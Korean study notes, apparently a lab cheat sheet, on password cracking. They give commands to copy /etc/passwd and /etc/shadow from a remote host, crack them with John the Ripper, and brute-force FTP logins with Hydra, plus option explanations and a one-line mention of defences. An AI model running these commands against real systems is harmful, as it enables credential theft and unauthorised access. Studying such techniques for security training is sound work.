scp 100.100.100.100:/etc/passwd ./
scp 100.100.100.100:/etc/shadow ./
[원하는 대상ip]:[경로][원하는 위치]
passwd 파일과 shadow 파일 합치기
unshadow passwd shadow > password
비번찾기 명령어: john password
john --wordlist=test.txt password
설치 apt-get install johnny
password 파일 찾기(없는 경우 아래에 있는 필터 설정을 All Files)
사전(wordlist) 바꾸기
공격 시작
hydra -l user -P passlist.txt ftp://IP
hydra -L userlist.txt -p defaultpw 서비스명://IP
명령어
l : 아이디, L: 아이디 리스트 파일
p: 비빌번호, P: 비밀번호 사전파일
/root/Desktop/pw.txt : 사전파일 경로
ftp://192.168.0.7 : ftp 주소
v : 자세히
V : login+pass 보여줌
f : 비밀번호를 발견하면 종료
x 3:3:1a! : 최소3자리 : 최대3자리 : 숫자와 소문자로 구성되어 있으며 !문자가 포함된 비밀번호
burt forcing : 무차별대입
t : 동시에 실행하는 작업수
w : 대기시간
원리: 패스워크 크래킹을 서비스에서 찾을때는 리턴되는 langth 값을 파악하여 성공과 실패를 구분하게 됨
보안방법: 서비스 제한, 특정 횟수 이상의 시도 제한